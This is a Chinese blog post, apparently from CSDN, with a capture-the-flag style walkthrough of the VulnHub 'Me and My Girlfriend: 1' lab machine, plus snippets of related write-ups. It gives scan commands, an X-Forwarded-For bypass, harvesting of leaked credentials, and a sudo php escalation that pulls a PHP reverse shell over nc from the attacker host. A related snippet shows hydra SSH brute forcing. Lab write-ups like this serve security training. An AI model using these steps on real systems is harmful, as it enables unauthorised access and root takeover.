vulnhub靶机练习-Me and My Girlfriend: 1

最新推荐文章于 2024-04-18 21:18:52 发布
最新推荐文章于 2024-04-18 21:18:52 发布
阅读量1.1k 收藏 1
点赞数 1
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_41631806/article/details/103619441

vulnhub靶机练习-Me and My Girlfriend: 1

靶机下载地址:https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/点击直接下载

  1. 靶机介绍
    DescriptionBack To The Top
    Description: This VM tells us that there are a couple of lovers namely Alice and Bob, where the couple was originally very romantic, but since Alice worked at a private company, “Ceban Corp”, something has changed from Alice’s attitude towards Bob like something is “hidden”, And Bob asks for your help to get what Alice is hiding and get full access to the company!
    Difficulty Level: Beginner
    Notes: there are 2 flag files
    Learning: Web Application | Simple Privilege Escalation
    谷歌翻译
  2. 靶机安装
    虚拟机:vmware workstation 15 pro(官网使用Virtualbox)
    攻击者:kali linux(ip:192.168.15.131)
    文件:Me-and-My-Girlfriend-1.ova
    步骤:vmware workstation点击打开虚拟机,载入.ova,完成靶机安装。将靶机网络设置成与kali linux相同的模式——nat模式。
  3. 主机发现,kali扫描用网段主机,发现目标主机IP为192.168.15.141。
netdiscover -r 192.168.15.131/24

在这里插入图片描述

  1. 对目标主机进行扫描,22/tcp open ssh、80/tcp open http开放。
nmap -sS -A 192.168.15.141

在这里插入图片描述

  1. 访问80端口,限制本地访问,可构造XXF注入。在这里插入图片描述
  2. burpsuite抓包,加入X-Forwarded-For:127.0.0.1(需一直加入消息头内)。
    在这里插入图片描述

forward(一直加入X-Forwarded-For:127.0.0.1)。
在这里插入图片描述
7. 没发现SQL注入,不是文件包含。注册,登录,在profile界面修改密码那,发现源码有账号密码明文。修改user_id,还有其他五个用户的账号密码,其中出现主人公Alice。账号:alice,密码:4lic3。
在这里插入图片描述在这里插入图片描述
8. 用alice的账号密码在kali linux上ssh登录。

ssh alice@192.168.15.141
  1. 登录成功,但是不是root权限,查看不了sudo权限用户。顺便在alice目录下发现了她的秘密和第一个flag
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
  2. 查看系统信息(此处是绕路弯路了,不过也是个思路 )
uname -a

在这里插入图片描述

  1. 用searchsploit查找相关漏洞,进行提权。
searchsploit ubuntu 14.04
searchsploit linux Kernel 4.4.0

在这里插入图片描述

  1. 目标主机没有编译c的环境,安装gcc需要root权限。所以我配置了一台相同参数系统,进行编译,然后用nc传输编译后的文件到目标主机上,运行,提权失败,原因是目标机不在exploit范围内。接着找了几个,都失败了。还是太菜,去网上看下题解。题解链接

  2. 正确方法。查看本用户能够执行的sudo权限。有php执行权限。

 sudo -l

在这里插入图片描述

  1. 上传kali的webshell。给kali反弹一个shell。
    kali(192.168.15.131):
nc -l -p 4444< /usr/share/webshells/php/php-reverse-shell.php

ssh:

nc -vn 192.168.15.131 4444 > shell
sudo php shell

反弹提权成功。
在这里插入图片描述

  1. root目录用户下找到第二个flag。
    参考资料:
    HTTP 请求头中的 X-Forwarded-For
    Vulnhub-Me and My Girlfriend: 1-Writeup
    新解题步骤1

(注:本人菜鸡,如有错误,欢迎评论指出)

onlyoneya
关注
vulnhub靶场之Me and My Girlfriend: 1
qq_34613171的博客
02-08 388
难度等级:初学者 注意:有2个标志文件 学习:Web应用程序| 简单特权升级 查看源码,发现要加入x-forwarded-for头。在这里插入图片描述 成功进入到登录页面。 点击register,随便注册一个账号。 这里发现注册id为12,前面应该有几个人。 成功登录。 点击profile,发现是一个修改密码的界面,我们把Chage按钮在源代码里修改为可点击,然后发送,burp抓包。...
vulnhub靶机---MY FILE SERVER: 1
Luciano12的博客
10-09 471
一、信息搜集 1.主机发现 netdiscover -i eth0 -r 192.168.1.0/24 2.使用nmap,nikto扫描端口信息 有21,22,80,445端口,打开网站,没有可利用的东西,使用了dirmap扫描目录,发现了readme.txt,上面nikto也扫描到了 二、漏洞利用 1.匿名登陆连接ftp,查找文件,没有发现可利用的文件,ssh登录拒绝 2.尝试连接smb服务,发现了共享文件夹 三个文件夹内只能匿名访问smbdata,查看里面的文件 在secure中发现账
VulnHub靶场-Me and My Girlfriend: 1
weixin_48972359的博客
04-16 1250
靶机ME AND MY GIRLFRIEND: 1靶机需求:靶机里有2个flag,我们的目标就是找出这2个flag。
VulnHub系列】Me-and-My-Girlfriend-靶机
薛定谔嘚喵博客
03-12 907
1.信息收集端口发现80和22通过80,使用x-forwarded-for头,就可以看到web后台扫描80的目录,看到一些空白的php文件,虽然前端是空白,后面如果可以查看php内容,这些就是重点查看对象2.web权限进入后台,添加用户后可以通过user_id越权查看所有的用户信息3.shell权限利用前面得到的信息,对ssh进行尝试登录4.权限维持使用ssh进行连接登录,发现flag5.提权(两种方式)
靶机渗透之Me-and-My-Girlfriend
weixin_64267091的博客
12-20 1913
总结一下打靶过程:第一步:信息收集。主机发现和端口扫描,确定端口号基本上是80端口。然后进行漏洞扫描,没有扫出来有用的信息,最后就是目录扫描,扫出来一些有用的目录第二步:web渗透。打开扫描的目录,提示只允许本地登录,所以用BurpSuite改包在请求头添加x-forwarded-for:localhost绕过本地登录。
Me and My Girlfriend靶机渗透
她叫常玉莹
09-07 765
背景描述:这个VM告诉我们,有一对恋人,即Alice和Bob,这对夫妻本来很浪漫,但是自从Alice在一家私人公司“ Ceban Corp”工作以来,爱丽丝对鲍勃的态度发生了一些变化是“隐藏的”,而鲍勃(Bob)寻求您的帮助,以获取爱丽丝(Alice)隐藏的内容并获得对该公司的完全访问权限! 信息收集漏洞利用提权 信息收集 内网主机发现比较喜欢使用arp-scan工具,工具轻量扫描速度比较快。扫描结果得知目标靶机的ip地址为192.168.0.106 使用nmap进行扫描 得知目标端口开放了22端口.
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
vulnhub靶机实战--FunBox3:EASY
m0_64312309的博客
09-21 800
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤
VulnHub靶机 DC-5 打靶 渗透测试详细过程
网络空间安全学习
04-18 1483
在访问/footer.php,/thankyou.php时发现跳转界面和原始界面的年份不一样,总是来回变动,刷新也会变动。目录爆破发现,存在file参数,尝试读取一下/etc/passwd文件,成功读取/etc/passwd文件并回显成功。当然既然知道了包含/footer.php文件,那么我们也可以去猜解参数,常用的如file,尝试一下即可,或者爆破。暴露出如下几个目录,去访问发现其中的目录,爆出的目录其中有一些界面为默认界面当中点击跳转的目录。给予sh文件执行权限,直接执行一下试试,成功提权。
Me-and-My-girlfriend-1靶机实战-vuluhub系列(完结)
PANDA墨森的博客
07-11 932
这是vuluhub靶机实战系列完结篇了,本次主要知识点为:XFF头绕过限制,越权漏洞、sudo滥用提权之php命令 靶机下载地址: https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/ 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13234298.html #001环境搭建 攻击机kali:192.168.136.129 靶机Me-and-My-girlfriend-1192.168..
靶机测试 Me and My Girlfriend1笔记
qq_56426046的博客
01-08 714
用这个X-Forwarded-For Header插件 再增加上 127.0.0.1 即可绕过。把id修改为1即可获取 id=1 用户的账号和密码。确定靶机地址192.168.1.103。发现 php 不需要密码就可以执行操作。点击个人信息查看源代码可以看见密码。修改id查看是否可以看到别人的密码。发现注册登录和注册页面 注册用户。后来,错过也成了人间常态。
入门靶机渗透之Me And My Girlfriend
Yaphst的博客
03-06 6892
靶场介绍 靶场下载地址:点击进入下载界面 下载.ova文件,在VMware中导入该虚拟机,导入完成后开启虚拟机。 这个靶场背景告诉我们有一对恋人,即 Alice 和 Bob,这对情侣原本很浪漫,但自从 Alice 在一家私人公司“Ceban Corp”工作后,Alice 对 Bob 的态度发生了一些变化,就像“ 隐藏”了什么,Bob 请求您帮助以获取 Alice隐藏的内容并获得对公司的完全访问权限! 信息收集 打开我们的Kali,查看kali的ip地址,为192.168.123.154 由于是靶机环境
靶机攻略| Me-and-My-Girlfriend |
niext的博客
10-23 1687
1.靶机下载:https://download.vulnhub.com/meandmygirlfriend/Me-and-My-Girlfriend-1.ova 2.靶机介绍 难度:✯✯✯ 目标:拿到两个flag 3.启动虚拟机 3.1信息搜集 主机发现 使用arp-scan扫描出3个ip地址: 第一个是我的VM8网卡,第三个是我设置的网关,如此确定第二个是目标IP。并且我查看了靶机的MAC地址与扫描出来的一致。 端口扫描 使用nmap扫描发现:22,80.
vulnhub靶场,Me-and-My-Girlfriend-1
kukudeshuo的博客
07-29 1062
vulnhub靶场,Me-and-My-Girlfriend-1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/ 攻击机:kali(192.168.109.128) 靶机Me-and-My-Girlfriend-1192.168.109.145) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定
Vulnhub靶机Me-and-My-Girlfriend-1
m0_52328368的博客
07-23 763
vulnhub靶场 Me-and-My-Girlfriend-1 详细操作过程
ME AND MY GIRLFRIEND: 1靶场渗透测试
Jianmuhtb的博客
07-29 406
靶场:ME AND MY GIRLFRIEND: 1,下载地址:https://download.vulnhub.com/meandmygirlfriend/Me-and-My-Girlfriend-1.ova攻击机:kali 2023.4环境:VMware网络:nat。
Me-and-My-Girlfriend-1靶机的Writeup
jie_a的博客
02-03 252
Me-and-My-Girlfriend-1靶机的Writeup实验工具实验内容第一步用扫描靶机ip第二步用nmap探测端口 实验工具 kali 2020 Me-and-My-Girlfriend-1靶机 实验内容 第一步用扫描靶机ip 输入代码,查找靶机ip netdiscover -i eth0 第二步用nmap探测端口 ...
Vulnhub靶场之Me-and-My-Girlfriend
weixin_51446936的博客
06-10 896
先看一下描述: 一、靶机搭建 1. 靶机下载 下载地址:https://download.vulnhub.com/meandmygirlfriend/Me-and-My-Girlfriend-1.ova 2. 靶机导入 第一步:导入(打开虚拟机–>选择下载的靶机–>选择存储路径–>导入) 注:会报导入失败的错误,点击重试即可。 第二步:导入后,删除网卡并重新添加(NAT网卡) 第三步:启动虚拟机 二、信息收集 1. nmap扫描确定靶机ip nmap -sS -Pn 192.168.
vulnhub靶机DC-1
最新发布
02-08
### VulnHub DC-1 靶机 攻略 介绍 #### 下载地址 VulnHub是一个提供各种虚拟机镜像用于安全测试和学习渗透测试技巧的平台。对于DC-1靶机,可以在[VulnHub官网](https://www.vulnhub.com/)搜索并下载该靶机镜像文件。 #### 初始信息收集 在启动DC-1之后,通过网络扫描工具如`nmap`来发现开放端口和服务版本是非常重要的初步操作[^2]。这有助于了解目标系统的潜在弱点所在之处。 ```bash nmap -A <target_ip> ``` #### Web应用漏洞探测 一旦确认存在Web服务运行于特定IP地址之上,则可以采用专门针对WordPress站点的安全评估工具WPScan来进行进一步的信息挖掘工作: ```bash wpscan --url http://<target_ip>/wordpress/ ``` 此命令能够帮助识别可能存在的插件或主题中的已知漏洞,并尝试获取管理员用户名列表等有用情报[^1]。 #### 获取初始访问权限 当已经掌握了某些关于网站后台管理账号线索后(比如默认用户名),可借助Hydra这样的暴力破解程序配合常用密码字典对登录界面发起攻击以期获得合法凭证进入内部环境: ```bash hydra -L /usr/share/wordlists/usernames.txt -P /usr/share/wordlists/passwords.txt ssh://<target_ip> ``` 这里假设SSH服务对外开放并且允许远程登陆;实际过程中还需根据具体情况调整相应参数设置[^3]。 #### 提升权限至root级别 成功创建Meterpreter会话意味着获得了较为深入的目标主机控制权,在此基础上继续探索其他未授权区域直至找到可用于提升当前用户权限的方法。例如,如果遇到弱配置下的Sudoers文件或是设置了简单密码的辅助账户,都可以成为突破口之一[^5]: ```bash sudo -l # 查看是否有无需密码即可执行高权限指令的情况 whoami # 确认当前身份 su admin # 尝试切换到更高权限用户 ``` 以上就是有关如何攻克VulnHub平台上名为DC-1这一挑战性实验项目的概览描述以及部分关键技术要点提示。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值